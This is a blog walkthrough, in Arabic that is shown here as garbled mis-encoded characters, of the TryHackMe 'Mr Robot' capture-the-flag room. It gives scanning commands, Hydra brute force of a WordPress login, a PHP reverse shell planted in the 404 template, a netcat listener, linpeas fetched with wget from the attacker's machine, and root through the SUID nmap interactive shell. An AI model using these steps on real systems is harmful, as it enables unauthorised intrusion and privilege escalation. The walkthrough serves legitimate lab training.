Search ๐Ÿ”Ž๐Ÿ–ฅ️

TryHackMe|MrRobotCTF WriteUp\Walkthrough (Arabic)

ุจุณู… ุงู„ู„ู‡

ุงู„ู„ูŠ ูŠุจุบู‰ ูŠุดูˆู ุงู„ุญู„ ู…ุดุฑูˆุญ ููŠุฏูŠูˆ ูŠุฑุฌุน ู„ู„ููŠุฏูŠูˆ ุนู„ู‰ ู‚ู†ุงุชูŠ ุจุงู„ูŠูˆุชูŠูˆุจ ุนู„ู‰ ู‡ุฐุง ุงู„ุฑุงุจุท:



ุฑุงุจุท ุงู„ุชุญุฏูŠ: https://tryhackme.com/r/room/mrrobot

============================================================

ูƒู„ู…ุฉ IP ููŠ ูƒู„ ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุฃูƒุชุจู‡ุง ุชُุณุชุจุฏู„ ุจุงู„ู€IP ู„ู„ู…ุดูŠู† ุญู‚ุชูƒู… ุนู„ู‰ TryHackMe

ุฃูˆู„ ุญุงุฌุฉ ู†ุดุบู„ ุงู„ู€machine ูˆู†ุชุฃูƒุฏ ุฅู†ู†ุง ุงุชุตู„ู†ุง ุจุดุจูƒุฉ TryHackMe ูˆุงู„ุงุชุตุงู„ ู…ุถุจูˆุท، ุจุนุฏูŠู† ู†ุจุฏุฃ ุจุฃูˆู„ ุฎุทูˆุฉ ู„ู„ุญู„ ูˆู‡ูŠ ุฅู†ู†ุง ู†ุณูˆูŠ scan ู„ู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… nmap

sudo nmap IP -vv

ุทู„ุน ู…ุนุงู†ุง 3 ุจูˆุฑุชุงุช 22 ูˆ 80 ูˆ443، ู†ุฑุฌุน ู†ุณูˆูŠ Aggressive ุณูƒุงู† ุนู„ู‰ ู†ูุณ ู‡ุฐู‡ ุงู„ุจูˆุฑุชุงุช

sudo nmap IP -vv -A -p 22,80,443

ุจูˆุฑุช 22 ุทู„ุน ุฅู†ู‡ุง closed، ู…ุน ุฅู†ู‡ุง ุธู‡ุฑุช ู…ุนุงู†ุง، ุญุชู‰ ู„ู…ุง ุณูˆูŠุช ุนู„ูŠู‡ุง ู„ูˆุญุฏู‡ุง ุณูƒุงู†، ุจุฑุถูˆ ู…ُุบู„ู‚ุฉ، ูู†ุชุฌุงู‡ู„ู‡ุง. ุนู„ู‰ ุจูˆุฑุช 80 ูˆ 443 ุนู†ุฏูŠ apache server

ุจู†ุณูˆูŠ directory enumeration  ุจุงุณุชุฎุฏุงู… gobuster ุนู„ู‰ ุจูˆุฑุช 80

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64

ุทู„ุน ู…ุนุงู†ุง ู…ุณุงุฑุงุช ูƒุซูŠุฑุฉ ุฌุฏุง، ุจู†ุฑูƒุฒ ุนู„ู‰ ุงู„ู…ุณุงุฑุงุช ุงู„ู„ูŠ ู†ุญุณู‡ุง ู…ู‡ู…ุฉ، ู…ุซู„ robots.txt  ูˆ readme ูˆ wp-admin. ุฃูˆู„ ุดูŠุก ุจู†ู„ุงุญุธุฉ ู‡ูˆ ูˆุฌูˆุฏ wp ุจูƒุซุฑุฉ ููŠ ุงู„ู…ุณุงุฑุงุช، ูˆู‡ุฐุง ูŠุนู†ูŠ ุฅู† ู‡ุฐุง ุงู„ู…ูˆู‚ุน ูŠุณุชุฎุฏู… WordPress. 

ุฃูˆู„ ุดูŠุก ุจู†ุฑูˆุญ ู„ู„ุตูุญุฉ ุงู„ุฑุฆูŠุณูŠุฉ ู„ู„ู…ูˆู‚ุน، ูˆุจูŠุดุบู„ ู„ู†ุง ููŠุฏูŠูˆ، ุซู… ู„ู…ุง ูŠู†ุชู‡ูŠ ุจูŠุนุทูŠู†ุง ู…ุฌู…ูˆุนุฉ ูƒูˆู…ุงู†ุฏุฒ ู†ู‚ุฏุฑ ู†ู†ูุฐู‡ุง، ูƒู„ ูƒูˆู…ุงู†ุฏ ุชุดุบู„ ููŠุฏูŠูˆ، ุฎู„ุงุต ู†ู†ุชู‚ู„ ู„ู€readme. ุจู†ู„ู‚ู‰ ุทุงุจุน ุฑุณุงู„ุฉ ูˆู„ูƒู† ุจุฑุถูˆ ู…ุงููŠู‡ุง ุดูŠุก ู…ู‡ู…. ู†ู†ุชู‚ู„ ู„ู€ robots.txt، ุจู†ู„ู‚ู‰ ุนู†ุฏู†ุง ู…ุณุงุฑูŠู†

ุงู„ุฃูˆู„ fsocity.dic ู‡ูˆ ู…ู„ู ููŠู‡ ู…ุฌู…ูˆุนุฉ ูƒู„ู…ุงุช ุจู†ุณุชุฎุฏู…ู‡ุง ููŠ ุงู„ู€brute force ุจู…ุฌุฑุฏ ุฒูŠุงุฑุชู†ุง ู„ู„ู…ุณุงุฑ ุจูŠุชุญู…ู„ ู…ุนุงู†ุง ุงู„ู…ู„ู. 

ุซุงู†ูŠ ู…ุณุงุฑ key-1-of-3.txt ููŠู‡ ุฃูˆู„ ูู„ุงู‚✨. 

ุจุงู‚ูŠ ู†ุฒูˆุฑ wp-admin، ูˆุจู†ู„ู‚ู‰ ุตูุญุฉ ุชุณุฌูŠู„ ุฏุฎูˆู„ WordPress. ูˆู„ูˆ ุฌุฑุจู†ุง ู†ุฏุฎู„ ุฃูŠ ุงุณู… ู…ุณุชุฎุฏู… ูˆูƒู„ู…ุฉ ุณุฑ ุจูŠุทุจุน ู…ุนุงู†ุง ุฑุณุงู„ุฉ ุฎุทุฃ، ูˆู„ูƒู† ุฑุณุงู„ุฉ ุงู„ุฎุทุฃ ู‡ุฐู‡ ู…ูˆุถุญ ููŠู‡ุง ุฅู† ุงุณู… ุงู„ู…ุณุชุฎุฏู… ุบู„ุท، ูˆู‡ุฐู‡ ู…ุดูƒู„ุฉ ูƒุจูŠุฑุฉ ุจุงู„ู†ุณุจุฉ ู„ู„ู…ูˆู‚ุน، ู„ุฃู†ู‡ุง ุชุณู‡ู„ ุนู…ู„ูŠุฉ ุงู„ู€brute force ู„ู„ู…ُุฎุชุฑู‚ูŠู†، ูˆู„ูƒู†ู‡ุง ููŠ ู‡ุฐู‡ ุงู„ุญุงู„ุฉ ุจุชููŠุฏู†ุง.

ูุงู„ุฎุทุฉ ุงู„ุญูŠู† ุฅู†ู†ุง ุจู†ุณูˆูŠ brute force ุนู„ู‰ ุงุณู… ุงู„ู…ุณุชุฎุฏู… ูู‚ุท، ุญุชู‰ ู†ู„ู‚ู‰ ุงุณู… ู…ุณุชุฎุฏู… ุตุญูŠุญ ุนู„ู‰ ู‡ุฐุง ุงู„ู†ุธุงู…، ุจุนุฏ ูƒุฐุง ุจู†ุณูˆูŠ brute force ู„ู‡ุฐุง ุงู„ุงุณู… ู…ุน ูƒู„ู…ุงุช ุณุฑ ู…ุฎุชู„ูุฉ، ูˆูŠุตูŠุฑ ู†ู„ู‚ู‰ ุทุฑูŠู‚ุฉ ู†ุฏุฎู„ ุจู‡ุง ู„ู„ู†ุธุงู…. ูˆุจูƒุฐุง ูŠูƒูˆู† ุงุฎุชุตุฑู†ุง ูˆู‚ุช ูƒุจูŠูŠูŠูŠุฑ، ุจุฏู„ ู…ุง ู†ุฌุฑุจ ุนุฏุฏ ู…ู† ุงู„ุชุจุงุฏูŠู„ ูƒุจูŠุฑ ุฌุฏุง ูˆูŠุงุฎุฐ ูˆู‚ุช ูƒุจูŠุฑ ุฌุฏุง، ู†ุฌุฑุจ ุญุชู‰ ู†ู„ู‚ู‰ ุงู„ุงุณู…، ุซู… ู†ุฌุฑุจ ู…ุน ุงู„ุงุณู… ุญุชู‰ ู†ู„ู‚ู‰ ูƒู„ู…ุฉ ุงู„ุณุฑ، ูˆู‡ุฐุง ูƒู„ู‡ ุงุณุชูุฏู†ุงู‡ ู„ุฃู† ุงู„ู…ูˆู‚ุน ู…ุง ุทุจุน password or username are incorrect ุจู„ ุทุจุน Invalid username

ูˆู‡ุฐู‡ ู…ุดูƒู„ุฉ ูƒุจูŠุฑุฉ، ูˆุนุดุงู† ูƒุฐุง ู…ุนุงุฏ ุตุฑู†ุง ู†ุดูˆูู‡ุง ุจุงู„ู…ูˆุงู‚ุน ู‡ุฐู‡ ุงู„ุฃูŠุงู…. ุฅุฐู† ุฃูˆู„ ุญุงุฌุฉ ุจู†ุจุญุซ ุนู† ุงุณู… ู…ุณุชุฎุฏู… ุตุญูŠุญ ุนู„ู‰ ู‡ุฐุง ุงู„ู…ูˆู‚ุน، ูˆุนุดุงู† ู†ุงุฎุฐ ูƒู„ ุงู„ู…ุนู„ูˆู…ุงุช ุงู„ู„ูŠ ู†ุจูŠู‡ุง ุนุดุงู† ู†ูƒู…ู„ ุงู„ู€hydra command ุจู†ู„ุชู‚ุท ุงู„ุทู„ุจ ุจุงุณุชุฎุฏุงู… brupsuite، ูˆู†ุงุฎุฐ ุฅู„ู‰ ุฃูŠู† ุจุชุฑูˆุญ ุงู„ุฑุณุงู„ุฉ، ูˆุงู„request body ุนุดุงู† ู†ุนุฑู ุงุณู…ุงุก ุงู„ู…ุชุบูŠุฑุงุช (ุงุณู… ุงู„ู…ุณุชุฎุฏู… ูˆูƒู„ู…ุฉ ุงู„ู…ุฑูˆุฑ)، ูˆุจูƒุฐุง ู†ูƒูˆู† ุฌุงู‡ุฒูŠู†. 

ู‡ุฐุง ุงู„ุทู„ุจ ุจุนุฏ ู…ุง ุงู„ุชู‚ุทู†ุงู‡ ุจุงู„ู€burp، ูˆูˆุถุญุช ุจุงู„ุชุญุฏูŠุฏ ูˆุด ุงู„ู„ูŠ ู†ุญุชุงุฌู‡ ู…ู†ู‡

ุงู„ู€hydra command ู„ู„ู€post request ุชูƒูˆู† ูƒุงู„ุชุงู„ูŠ:

ู‡ุฐู‡ ุงู„ุตูŠุบุฉ ุงู„ุนุงู…ุฉ:

sudo hydra <username> <wordlist> IP http-post-form "<path>:<login_credentials>:<invalid_response>"

ูˆู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ ุงู„ู„ูŠ ุจู†ุดุบู„ู‡ุง

ู…ุง ุจูŠุทูˆู„ ูˆุจูŠุทู„ุน ู…ุนุงู†ุง ู…ุณุชุฎุฏู… ุงุณู…ู‡ Elliot، ุฅุฐุง ูƒุงู†ุช ู‡ุฐู‡ ุงู„ู†ู‚ุทุฉ ู…ูˆ ูˆุงุถุญุฉ ู…ู…ูƒู† ุชุฑุฌุนูˆู† ู„ู…ู‚ุทุน ุงู„ุดุฑุญ ู…ู† ุงู„ุฏู‚ูŠู‚ุฉ 7:32 ุญุชู‰ 11:35.

ุซู… ุจุนุฏ ูƒุฐุง ุจู†ุจุญุซ ุนู† ูƒู„ู…ุฉ ุงู„ุณุฑ، ุจู†ูุณ ุงู„ูƒูˆู…ุงู†ุฏ ู„ูƒู† ุจู†ุบูŠุฑ ุฃุดูŠุงุก ุจุณูŠุทุฉ

ู‡ู†ุง ุบูŠุฑู†ุง ุงุณู…ุงุก ุงู„ู…ุณุชุฎุฏู…ูŠู† ูˆุฎู„ูŠู†ุงู‡ุง ุงุณู… ูˆุงุญุฏ ูˆู‡ูˆ Elliot، ูˆูƒู„ู…ุฉ ุงู„ุณุฑ ุงุณุชุฎุฏู…ู†ุง fsocity.dic، ูˆุบูŠุฑู‡ุง ุงู„ุฑุฏ ูˆุฎู„ูŠู†ุงู‡ S=302، ูˆู‡ูˆ ูŠุฑู…ุฒ ู„ุฅุนุงุฏุฉ ุงู„ุชูˆุฌูŠู‡، ูู‡ุฐุง ู…ุนู†ุงุชู‡ ุฅู†ู‡ ู„ู‚ูŠู†ุง ูƒู„ู…ุฉ ุณุฑ ุตุญูŠุญุฉ، ุจุฏุงู„ ู…ุง ู†ุญุท ุงู„ุฑุณุงู„ุฉ، ูˆูƒู„ู‡ุง ุจุชุดุชุบู„ ุชู…ุงู…. ู„ูƒู† ู„ูˆ ู‚ุฑุฑู†ุง ู†ุญุท ุงู„ุฑุณุงู„ุฉ، ู„ุงุฒู… ู†ุฑุฌุน ู„ู„ู…ูˆู‚ุน ูˆู†ุญุท Elliot ุซู… ู†ุญุท ุฃูŠ ูƒู„ู…ุฉ ุณุฑ، ูˆู†ุดูˆู ูˆุด ุฑุณุงู„ุฉ ุงู„ุฎุทุฃ ุงู„ู„ูŠ ุชุทู„ุน ูˆู†ุณุชุฎุฏู…ู‡ุง، ู…ุง ูŠู†ูุน ู†ุณุชุฎุฏู… ู†ูุณ ุฑุณุงู„ุฉ ุงู„ุฎุทุฃ ุงู„ู„ูŠ ุทู„ุนุช ู„ู…ุง ุฏุฎู„ู†ุง ุงุณู… ู…ุณุชุฎุฏู… ุฎุงุทุฆ.

ุงู„ุญูŠู† ุตุงุฑ ุนู†ุฏู†ุง ุงุณู… ู…ุณุชุฎุฏู… ูˆูƒู„ู…ุฉ ุณุฑ، ู†ุฑุฌุน ู„ู„ู…ูˆู‚ุน ูˆู†ุณุฌู„ ุฏุฎูˆู„ ุจู‡ุง، ุจุนุฏ ู…ุง ู†ุฏุฎู„ ุนู„ู‰ ุงู„ู…ูˆู‚ุน، ุงู„ู‡ุฏู ุงู„ุขู† ู‡ูˆ ุฅู† ู†ุญุตู„ ุนู„ู‰ reverse shell، ูˆู…ู† ุงู„ุทุฑู‚ ุงู„ู†ุงุฌุญุฉ ู…ุน WordPress ู‡ูˆ ุงุณุชุบู„ุงู„ ุตูุญุฉ ุงู„ุฎุทุฃ، ูู†ุฑูˆุญ ู„ู€ Appearance ู…ู† ุงู„ู‚ุงุฆู…ุฉ ุงู„ุฌุงู†ุจูŠุฉ، ุซู… ู†ุฎุชุงุฑ Editor ุจุนุฏ ูƒุฐุง ุจูŠูุชุญ ู…ุนุงู†ุง ุตูุญุฉ ููŠู‡ุง ู…ุฌู…ูˆุนุฉ ู…ู† ุฃูƒูˆุงุฏ ุงู„ุตูุญุงุช، ุซู… ู†ุจุญุซ ุนู† ุตูุญุฉ ุงู„ุฎุทุฃ 404 template، ู†ุถุบุท ุนู„ูŠู‡ ูˆู†ู…ุณุญ ุงู„ูƒูˆุฏ ุงู„ู„ูŠ ุจุฏุงุฎู„ู‡ ูˆู†ุญุท ุจุฏุงู„ู‡ ุงู„ู€shell ุญู‚ุชู†ุง. 

ุฃู†ุง ุงุณุชุฎุฏู…ุช ุงู„ู€pentestmonkey php shell ุฃุฎุฐุชู‡ุง ู…ู† ุงู„ู…ูˆู‚ุน revshells ูˆู‡ูˆ ู…ูˆู‚ุน ู…ู…ุชุงุฒ ูˆูŠุฎู„ูŠูƒ ุชุญุตู„ ุนู„ู‰ shell ุจุณู‡ูˆู„ุฉ ูˆูŠุฌู…ุน ุงู„ุฃู†ูˆุงุน ุจู…ูƒุงู† ูˆุงุญุฏ، ุงู„ู…ู‡ู… ุชุฃูƒุฏูˆ ุฅู† ุงู„ุนู†ูˆุงู† ู‡ูˆ ุนู†ูˆุงู† ุงู„ู€VPN  ู„ุฌู‡ุงุฒูƒู… ، ูˆุงู„ุจูˆุฑุช ู†ูุณ ู…ุง ุชุจุบูˆู†.

ู†ุฑุฌุน ู„ู„ู€ dashboard ูˆู†ู„ุตู‚ ุงู„ู€shell ุซู… ู†ุถุบุท update file، ุงู„ุญูŠู† ูƒู„ ุงู„ู„ูŠ ุนู„ูŠู†ุง ู†ุณูˆูŠู‡ ุฅู†ู†ุง ู†ุฒูˆุฑ ุตูุญุฉ ุบูŠุฑ ู…ูˆุฌูˆุฏุฉ ุนู„ู‰ ุงู„ู…ูˆู‚ุน، ูˆุจุฏุงู„ ู…ุง ูŠุทุจุน ู„ู†ุง ุตูุญุฉ ุงู„ุฎุทุฃ، ุจูŠู†ูุฐ ุงู„ู€reverse shell ูˆุจูŠูˆุตู„ ู„ู†ุง ุงุชุตุงู„ ู…ู† ุงู„ุถุญูŠุฉ. 

ู†ุฌู‡ุฒ ุงู„ู€Listener  ุนู„ู‰ ุฌู‡ุงุฒู†ุง 

nc -nlvp 4444

ู…ู† ุงู„ุตูุญุงุช ุงู„ู„ูŠ ุบูŠุฑ ู…ูˆุฌูˆุฏุฉ، ู…ุซู„ุง http://IP/asmaa ูˆุฅุฐุง ุฒุฑู†ุง ู‡ุฐู‡ ุงู„ุตูุญุฉ، ุจูŠูˆุตู„ ุงู„ุงุชุตุงู„ ุนู„ู‰ ุฌู‡ุงุฒู†ุง. 

ุจู…ุง ุฅู† ุงู„ู€victim  ุฌู‡ุงุฒ ู†ูˆุงุชู‡ linux ูุฌุฏุง ุณู‡ู„ ุฅู†ู†ุง ู†ุณูˆูŠ stabilization ู„ู„ู€shell، ุงูŠุด ูŠุนู†ูŠ؟ ูŠุนู†ูŠ ู†ุฎู„ูŠู‡ุง ู…ุชูŠู†ุฉ ูˆู…ุง ุชู‚ูู„ ุฃูˆู„ ู…ุง ู†ุถุบุท ctrl+c ูˆู†ู‚ุฏุฑ ู†ุณุชุฎุฏู… ุงู„ุฃุณู‡ู… ูˆ tab completion ูˆูƒุฐุง.

ุงู„ุฎุทูˆุงุช ูƒุงู„ุชุงู„ูŠ:

ู†ุดุบู„ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ ุจุงุณุชุฎุฏุงู… python3 ุฅุฐุง ู…ุง ุถุจุท ุนุงุฏูŠ ู†ุฌุฑุจ python

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

ุจุนุฏูŠู† ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

export TERM=xterm

ุซู… ู†ุถุบุท ุนู„ู‰ ุงู„ูƒูŠุจูˆุฑุฏ ctrl+z ุนุดุงู† ู†ุฎู„ูŠ ุงู„ู€shell ุชุฑุฌุน ู„ู„ุฎู„ููŠุฉ

ุงู„ุญูŠู† ู†ุฌูŠุจู‡ุง ู„ู‚ุฏุงู… ุจุงุณุชุฎุฏุงู… ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

stty raw -echo;fg

ุงู„ุญูŠู† ุตุงุฑ ู…ุนุงู†ุง stable shell ู†ู‚ุฏุฑ ู†ุณุชุฎุฏู…ู‡ุง ุจุฑุงุญุชู†ุง ุจุฏูˆู† ู…ุง ู†ุฎุงู ุฅู†ู‡ุง ุชุทูŠุฑ ุฃูˆ ุชุทูุดู†ุง ุฅุฐุง ุฌูŠู†ุง ู†ู…ุณุญ ูˆู†ุนุฏู„ ุจุงู„ูƒู„ู…ุงุช. ุฅุฐุง ุฑุฌุนุช ู„ูƒู… ุงู„ู€shell ู…ุงู‡ูŠ ู…ู†ุชุธู…ุฉ ูˆุจุงุฏูŠุฉ ู…ู† ู†ุต ุงู„ุณุทุฑ، ุจุณ ุดุบู„ูˆ ุฃูŠ ูƒูˆู…ุงู†ุฏ ู…ุซู„ id ูˆุจุชุฑุฌุน ุชุถุจุท ุจุฅุฐู† ุงู„ู„ู‡.

ู…ู…ูƒู† ุจุฑุถูˆ ู†ุนุฏู„ ุงู„ุตููˆู ูˆุงู„ุฃุนู…ุฏุฉ ู„ู„ู€shell ุงู„ู„ูŠ ุดุบุงู„ูŠู† ุนู„ูŠู‡ุง، ุนุดุงู† ู„ู…ุง ู†ูุชุญ ู…ุญุฑุฑ ู†ุตูˆุต ู…ุซู„ุง ู…ุง ุชู†ุญุงุณ ุนู„ูŠู†ุง ุงู„ู†ุงูุฐุฉ، ูˆุนุดุงู† ู†ุณูˆูŠ ูƒุฐุง:

ู†ูุชุญ ู†ุงูุฐุฉ ุฌุฏูŠุฏุฉ ูˆู†ุฎู„ูŠ ู…ู‚ุงุณ ุงู„ุฎุท ู…ุซู„ ุงู„ู„ูŠ ุงุญู†ุง ุดุบุงู„ูŠู† ุนู„ูŠู‡ุง، ุซู… ู†ุดุบู„ ุงู„ูƒูˆู…ุงู†ุฏ

stty -a

ูˆู†ุดูˆู ูƒู… ู‚ูŠู…ุฉ ุงู„ุตููˆู ูˆุงู„ุฃุนู…ุฏุฉ، ุซู… ู†ุฑูˆุญ ู†ุณุฌู„ ู†ูุณ ุงู„ู‚ูŠู…ุฉ ุนู„ู‰ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ุจุงุณุชุฎุฏุงู… ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

stty rows 31; stty cols 134

ู†ุฑูˆุญ ุนู„ู‰ home directory

cd /home

ls

ุนู†ุฏูŠ ู…ุณุชุฎุฏู… ูˆุงุญุฏ robot

cd robot

ls -al 

ุจู†ู„ุงู‚ูŠ ุซุงู†ูŠ ูู„ุงู‚ ู‡ู†ุง، ูˆู„ูƒู† ู…ุง ูŠู‚ุฏุฑ ูŠู‚ุฑุฃู‡ ุฅู„ุง robot ูˆุงุญู†ุง ุงู„ุญูŠู† www-data، ูู„ุงุฒู… ู†ุตูŠุฑ robot، ูˆู„ูƒู† ููŠ ู†ูุณ ุงู„ู…ู„ูุงุช، ููŠ ู…ู„ู ุงุณู…ู‡ password.raw-md5، ูˆูŠุจุฏูˆ ุฅู† ุจุฏุงุฎู„ู‡ ูƒู„ู…ุฉ ุงู„ุณุฑ hashed ุจุงุณุชุฎุฏุงู… md5، ูู†ูุชุญ ุงู„ู…ู„ู ูˆู†ุงุฎุฐ ู…ุญุชูˆูŠุงุชู‡ ูˆู†ุณูˆูŠ crack ู„ู‡ุง

ุฃู†ุง ุงุณุชุฎุฏู…ุช ู‡ุฐุง ุงู„ู…ูˆู‚ุน

 https://crackstation.net/

ุจุนุฏ ู…ุง ุชุทู„ุน ู…ุนุงู†ุง ูƒู„ู…ุฉ ุงู„ุณุฑ ู†ุงุฎุฐู‡ุง ูˆู†ุบูŠุฑ ุงู„ู…ุณุชุฎุฏู… ุฅู„ู‰ robot

su robot

ุซู… ู†ุฏุฎู„ ูƒู„ู…ุฉ ุงู„ุณุฑ، ุจุนุฏ ูƒุฐุง ู†ู‚ุฑุฃ ุงู„ู…ู„ู

cat key-2-of-3.txt

ูˆุจูƒุฐุง ุญุตู„ู†ุง ุนู„ู‰ ุซุงู†ูŠ ูู„ุงู‚ ✨

ุขุฎุฑ ูู„ุงู‚ ุบุงู„ุจุง ูŠูƒูˆู† ููŠ ุงู„ู€root home directory، ูู„ุงุฒู… ู†ุฑูุน ุตู„ุงุญูŠุงุชู†ุง ุนุดุงู† ู†ู‚ุฏุฑ ู†ูˆุตู„ ู„ู‡، ูˆู…ู…ูƒู† ู†ุจุญุซ ุจู†ูุณู†ุง ุนู† ุทُุฑู‚ ู†ุณุชุบู„ู‡ุง، ุฃูˆ ู…ู…ูƒู† ู†ุณุชุฎุฏู… ุณูƒุฑูŠุจุช ูŠุณู‡ู„ ุนู„ูŠู†ุง ุงู„ู…ูˆุถูˆุน، ู…ุซู„ linpeas.sh، ูˆุนุดุงู† ู†ู†ู‚ู„ู‡ ู„ู„ุถุญูŠุฉ ู†ุฑูˆุญ ุนู„ู‰ ุงู„ู…ุฌู„ุฏ ุงู„ู„ูŠ ููŠ ุฌู‡ุงุฒู†ุง ูŠุญุชูˆูŠ ุนู„ู‰ linpeas.sh ูˆู†ุดุบู„ ุจุงูŠุซูˆู† ุณูŠุฑููŠุฑ

python3 -m http.server

ูˆุนู„ู‰ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ู†ุฑูˆุญ ู„ู„ู€tmp ูˆู†ุญู…ู„ ุงู„ู…ู„ู ู‡ู†ุงูƒ

ุทูŠุจ ู„ูŠู‡ ุงุฎุชุฑุช ุงู„ู€tmp ؟؟

ุฃูˆู„ ุญุงุฌุฉ tmp ู‡ูˆ ู…ู„ู ูƒู„ ุงู„ู…ู„ูุงุช ุงู„ู„ูŠ ููŠู‡ ุชُู…ุณุญ ุชู„ู‚ุงุฆูŠุง ุนู†ุฏ ุฅุบู„ุงู‚ ุงู„ุฌู‡ุงุฒ، ูู…ุซู„ุง ู„ูˆ ูƒู†ุช ุชุดุชุบู„ ููŠ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ูˆูุฌุฃุฉ ุชู‚ูู„، ุนู„ุทูˆู„ ุจูŠู†ู…ุณุญ ุฃูŠ ุดูŠุก ุญู…ู„ุชู‡ ู‡ู†ุงูƒ ุนู„ู‰ tmp ูˆูŠุตูŠุฑ ู…ุง ูŠุจู‚ู‰ ู„ูƒ ุฃุซุฑ. 

ุซุงู†ูŠ ุญุงุฌุฉ، ู„ู…ุง ู†ุดุชุบู„ ุนู„ู‰ ุฌู‡ุงุฒ ุฃูุถู„ ุฅู†ู†ุง ู†ุฌุนู„ ู…ู„ูุงุชู†ุง ู…ุญููˆุธุฉ ููŠ ู…ูƒุงู† ูˆุงุญุฏ، ู„ุณู‡ูˆู„ุฉ ุงู„ูˆุตูˆู„ ู„ู‡ุง ูˆู„ุณู‡ูˆู„ุฉ ู…ุณุญู‡ุง ูˆุงู„ุชุฎู„ุต ู…ู†ู‡ุง، ูˆูŠุง ุณู„ุงู… ู„ูˆ ูƒุงู† ู‡ุฐุง ุงู„ู…ูƒุงู† ู‡ูˆ ู…ู† ู†ูุณู‡ ูŠู…ุณุญ ุงู„ู„ูŠ ููŠู‡ ู„ูˆ ุชู… ุฅุบู„ุงู‚ ุงู„ุฌู‡ุงุฒ ุจุดูƒู„ ู…ูุงุฌุฆ. 

wget http://OpenVPN-IP:8000/linpeas.sh

ุซู… ู†ุบูŠุฑ ุตู„ุงุญูŠุงุชู‡ ู„ู…ู„ู ุชุดุบูŠู„ูŠ 

chmod +x linpeas.sh

ุซู… ู†ุดุบู„ู‡ 

./linpeas.sh

ุจูŠุทู„ุน ู…ุนุงู†ุง ููŠ ุงู„ู€SUID ู†ู‚ุทุฉ ู„ุฑูุน ุงู„ุตู„ุงุญูŠุงุช ู†ุณุจุชู‡ุง %95 ูˆู‡ูŠ Nmap، ูˆุนุดุงู† ู†ุณุชุบู„ู‡ุง ุจู†ุจุญุซ ููŠ ู…ูˆู‚ุน ู…ู…ุชุงุฒ ุงุณู…ู‡ GTFObins ุซู… ู†ุจุญุซ ุนู† Nmap ูˆุชุญุช Sudo ูู‚ุฑุฉ ุจ ู†ุณูˆูŠ ู†ูุณ ู…ุง ูŠู‚ูˆู„، ู„ูƒู† ู…ุง ูŠุญุชุงุฌ ู†ุณุชุฎุฏู… sudo ู„ุฃู† ู‡ูŠ SUID ูุจุชุดุชุบู„ ุจุตู„ุงุญูŠุงุช ุงู„ู…ุงู„ูƒ ุฃุตู„ุง ูˆู‡ูˆ ุงู„ู€root

ู†ุฑุฌุน ุนู„ู‰ ุงู„ุถุญูŠุฉ ูˆู†ู†ูุฐ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

nmap --interactive 

ู†ุฏุฎู„ู‡ุง ุซู… ุจูŠูุชุญ ู…ุนุงู†ุง nmap prompt 

ุซู… 

!sh

ุจู†ุญุตู„ ุนู„ู‰ ุฑูˆูˆุช، ุซู…

cd /root

ls

ุซู… ู†ุนุฑุถ ุขุฎุฑ ูู„ุงู‚ ✨

cat key-3-of-3.txt

ูˆุจูƒุฐุง ุงู†ุชู‡ูŠู†ุง ู…ู† ุญู„ ุงู„ุชุญุฏูŠ، ุจุงู„ุชูˆููŠูŠูŠูŠู‚ ๐Ÿ‘‹๐Ÿป✨

Comments

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

TryHackMe|GoldenEye WriteUp\Walkthrough (English)

TryHackMe|Gallery WriteUp\Walkthrough (English)